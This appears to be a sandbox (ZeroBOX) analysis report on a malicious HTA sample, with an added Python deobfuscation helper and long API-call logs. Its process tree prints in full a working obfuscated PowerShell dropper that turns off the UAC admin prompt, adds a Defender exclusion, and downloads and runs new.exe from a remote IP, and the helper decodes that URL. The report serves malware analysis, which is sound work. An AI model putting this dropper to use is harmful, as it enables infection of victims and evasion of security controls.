Summary | ZeroBOX

sample.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
Category FILE
Machine s1_win7_x6403_us
Started Oct. 21, 2024, 2:27 p.m.
Completed Oct. 21, 2024, 2:48 p.m.
Size 11.6KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 626bcb3968271f435d45e03c6b730644
SHA256 07a15009109cb6c6669079ed6ebb74b4f5ef3346aa18d85562786742b9344550
CRC32 5EE4A471
ssdeep 192:nkhhDGyAjyZv9t9GUcex0PzHQz2RlG777mz//CKExs:nkhhKyAOZvf9Fcex0PzHQzSlG777mT6W
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\sample.hta

    PID 1188
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac

      PID 2060
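The PowerShell stage above hides every sensitive string behind dKWlQUWuijH, which rebuilds text by subtracting the constant 33541 from each element of an integer array. The Python helper below is an added analyst's example, not part of the ZeroBOX report or of the sample: it reads the decoder's name and offset out of the script, decodes every call site in place, and lists the recovered strings and URLs. OBFUSCATED_EXCERPT is a fragment of the recorded command line reflowed onto several lines; the regular expressions and function names are the example's own.

```python
"""Decode the char-offset string obfuscation in this sample's PowerShell stage."""
import re
from urllib.parse import urlparse

# Fragment of the command line recorded for process 2060 above, reflowed onto
# separate lines. Only the decoder function and the five call sites that feed it
# are kept; the helpers work unchanged on the full one-liner.
OBFUSCATED_EXCERPT = r"""
function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};
if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }
elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}
elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}
$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));
$bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));
"""

# The decoder always has the shape
#   function NAME($arg){$KEY=NNNNN;$out=$Null;foreach($c in $arg){$out+=[char]($c-$KEY)};return $out}
# Name and key are randomised per build, so both are read from the script.
DECODER_RE = re.compile(
    r"function\s+(\w+)\(\$\w+\)\{\$(\w+)=(\d+);[^}]*\[char\]\(\$\w+-\$\2\)"
)


def find_decoder(script):
    """Return (function_name, offset) of the char-offset decoder in `script`."""
    m = DECODER_RE.search(script)
    if m is None:
        raise ValueError("no char-offset decoder found")
    return m.group(1), int(m.group(3))


def decode_array(codes, offset):
    """Mirror the decoder: one character per element, chr(code - offset)."""
    return "".join(chr(c - offset) for c in codes)


def deobfuscate(script):
    """Replace every `NAME @(n,n,...)` call with a quoted literal.

    Returns (rewritten_script, decoded_strings_in_order_of_appearance).
    """
    name, offset = find_decoder(script)
    call_re = re.compile(r"\(?" + re.escape(name) + r"\s+@\(([\d,\s]+)\)\)?")
    decoded = []

    def repl(m):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        text = decode_array(codes, offset)
        decoded.append(text)
        return "'" + text + "'"

    return call_re.sub(repl, script), decoded


def triage(script):
    """Decode the script and pull out the indicators an analyst wants first."""
    rewritten, decoded = deobfuscate(script)
    urls = [s for s in decoded if s.startswith(("http://", "https://"))]
    return {
        "decoded": decoded,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "extensions": [s for s in decoded if re.fullmatch(r"\.\w+", s)],
        "rewritten": rewritten,
    }


if __name__ == "__main__":
    result = triage(OBFUSCATED_EXCERPT)
    for s in result["decoded"]:
        print(repr(s))
    print(result["rewritten"])
```

Run against the excerpt, the helper recovers the three extension checks (.dll, .ps1, .msi), the class name Net.WebClient and the download URL http://210.56.13.114/new.exe, whose host is the one IP listed in the hosts table below. The script writes the downloaded file to %AppData%\new.exe and dispatches it by extension; the .msi branch calls misexec rather than msiexec, so that path cannot succeed as written. The console output further down shows two steps failing on this Windows 7 image: Add-MpPreference is not a recognised cmdlet there, and the installed .NET's SecurityProtocolType offers only Ssl3 and Tls, so the TLS12 assignment throws.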

Name Response Post-Analysis Lookup
No hosts contacted.

IP Address Status Action
210.56.13.114 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:1318
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhj
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: suSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }el
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: seif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){pow
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWi
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: th((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: }else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPw
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: q){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: 33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::Se
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: curityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgT
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: FTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach(
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: $bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhM
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: yYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:A
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Micro
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: soft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -V
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: alue 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference <<<< -ExclusionPath $x
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: sXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $ob
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: JQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQU
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: WuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: 33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: ;}enAxnkDfhW; uac
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: mmandNotFoundException
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: At line:1 char:708
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhj
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: suSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: ((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }el
console_handle: 0x000001f3
1 1 0

WriteConsoleW

buffer: seif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){pow
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: ershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWi
console_handle: 0x0000020b
1 1 0

WriteConsoleW

buffer: th((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd
console_handle: 0x00000217
1 1 0

WriteConsoleW

buffer: }else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPw
console_handle: 0x00000223
1 1 0

WriteConsoleW

buffer: q){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,
console_handle: 0x0000022f
1 1 0

WriteConsoleW

buffer: 33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]:: <
console_handle: 0x0000023b
1 1 0

WriteConsoleW

buffer: <<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $F
console_handle: 0x00000247
1 1 0

WriteConsoleW

buffer: txzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};fu
console_handle: 0x00000253
1 1 0

WriteConsoleW

buffer: nction dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;fo
console_handle: 0x0000025f
1 1 0

WriteConsoleW

buffer: reach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv
console_handle: 0x0000026b
1 1 0

WriteConsoleW

buffer: -$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY =
console_handle: 0x00000277
1 1 0

WriteConsoleW

buffer: $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software
console_handle: 0x00000283
1 1 0

WriteConsoleW

buffer: \Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAd
console_handle: 0x0000028f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02527000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02513000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
